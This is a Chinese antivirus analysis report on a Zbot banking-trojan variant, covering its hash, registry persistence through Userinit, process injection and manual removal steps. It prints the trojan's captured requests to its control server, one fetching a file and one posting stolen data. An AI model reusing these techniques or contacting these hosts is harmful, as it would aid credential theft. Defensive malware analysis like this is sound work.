Trojan/Win32.Zbot.xud[Spy]分析

一、 病毒标签：
病毒名称： Trojan/Win32.Zbot.xud[Spy]
病毒类型： 木马
文件 MD5： 9675C6D6C5EC9FDF88EB202A219870CE
公开范围： 完全公开
危害等级： 4
文件长度： 92,160 字节
感染系统： Windows98以上版本

二、 病毒描述：
该病毒为ecard病毒变种，病毒运行后创建互斥量名为"_AVIRA_21099"、"_AVIRA_2108"、"__SYSTEM__64AD0625__"、"D95DA28801C9FA1E000000EC2"，动态获取大量API函数，获取当前用户的UI语言及计算机用户名，遍历进程查找"outpost.exe"、"zlclient.exe"（防火墙安全软件），判断自身进程路径是否为%System32%\目录下的sdra64.exe文件，如不是则拷贝自身到%System32%\目录下，命名为sdra64.exe将文件属性设置为隐藏、并在该文件尾部随机添加大量垃圾数据，干扰安全软件对其查杀，如是则修改注册表使用userinit.exe启动病毒，并监视注册表发现被删除之后立即添加，遍历进程找WINLOGON.EXE、SVCHOST.EXE、EXPLORER.EXE，找到之后打开进程获取模块句柄、获取进程绝对路径判断是进程否是病毒要查找的文件路径，如不是则关闭句柄，如是则申请内存空间从病毒体00400000为起始地址向以上进程中写入1024字节病毒数据，在System32%\目录下创建病毒文件夹lowsec在该目录内衍生2个病毒文件user.ds、local.ds将文件夹及文件设置为隐藏。

三、 行为分析：
本地行为:
1、文件运行后会释放以下文件
%System32%\sdra64.exe
%System32%\lowsec\user.ds   用于存储此特洛伊木马的加密配置
%System32%\lowsec\user.ds.lll
%System32%\lowsec\local.ds  用于保存收集的信息

2、修改注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
新: 字符串: "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,"
旧: 字符串: "C:\WINDOWS\system32\userinit.exe,"
描述：修改注册表使用userinit启动病毒

3、病毒运行后创建互斥量名为"_AVIRA_21099"、"_AVIRA_2108"、"__SYSTEM__64AD0625__"、"D95DA28801C9FA1E000000EC2"，动态获取大量API函数，获取当前用户的UI语言及计算机用户名，遍历进程查找"outpost.exe"、"zlclient.exe"（防火墙安全软件）

4、干扰安全软件对其查杀，如是则修改注册表使用userinit.exe启动病毒，并监视注册表发现被删除之后立即添加，遍历进程找WINLOGON.EXE、SVCHOST.EXE、EXPLORER.EXE，找到之后打开进程获取模块句柄、获取进程绝对路径判断是进程否是病毒要查找的文件路径，如不是则关闭句柄，如是则申请内存空间从病毒体00400000为起始地址向以上进程中写入1024字节病毒数据

5、收集电子邮件可能会通过电子邮件发送垃圾邮件信息来传播自身：
pop3
%s://%s:%s@%u.%u.%u.%u:%u/
ftppop3
/
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)http/1.1
post
geturlmon.dll
http/1.1

网络行为：
病毒运行后向91.206.201.7请求GET及发送post信息：
GET /djwlc/djwl.bin HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: arachka.com
Pragma: no-cache

POST /djwl/rec.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: arachka.com
Content-Length: 373
Connection: Keep-Alive
Pragma: no-cache
注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
        %Windir% 　　　　　 　　　　　  WINDODWS所在目录
　　　　%DriveLetter%　 　　　　　　　   逻辑驱动器根目录
　　　　%ProgramFiles%　 　 　　　　　  系统程序默认安装目录
　　　　%HomeDrive% 　　　　　　　　　 当前启动的系统的所在分区
　　　　%Documents and Settings% 　　　   当前用户文档根目录
　　　　%Temp% 　　　　　　　　　　　　\Documents and Settings
　　　　　　　　　　　　 　　　　　　　  \当前用户\Local Settings\Temp
　　　　%System32% 　　　　　　　　　　 系统的 System32文件夹
　　　　
　　　　Windows2000/NT中默认的安装路径是C:\Winnt\System32
　　　　windows95/98/me中默认的安装路径是%WINDOWS%\System
　　　　windowsXP中默认的安装路径是%system32%　　　

四、 清除方案：
1、使用安天防线可彻底清除此病毒(推荐)。
请到安天网站下载：http://www.antiy.com
2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。
（1）先打开Atool工具结束病毒相关进程
（2）使用Atool工具删除病毒衍生的文件
%System32%\sdra64.exe      
%System32%\lowsec\user.ds   
%System32%\lowsec\user.ds.lll
%System32%\lowsec\local.ds   
（3）恢复病毒修改的注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit
新: 字符串:
"C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe"
旧: 字符串: "C:\WINDOWS\system32\userinit.exe,"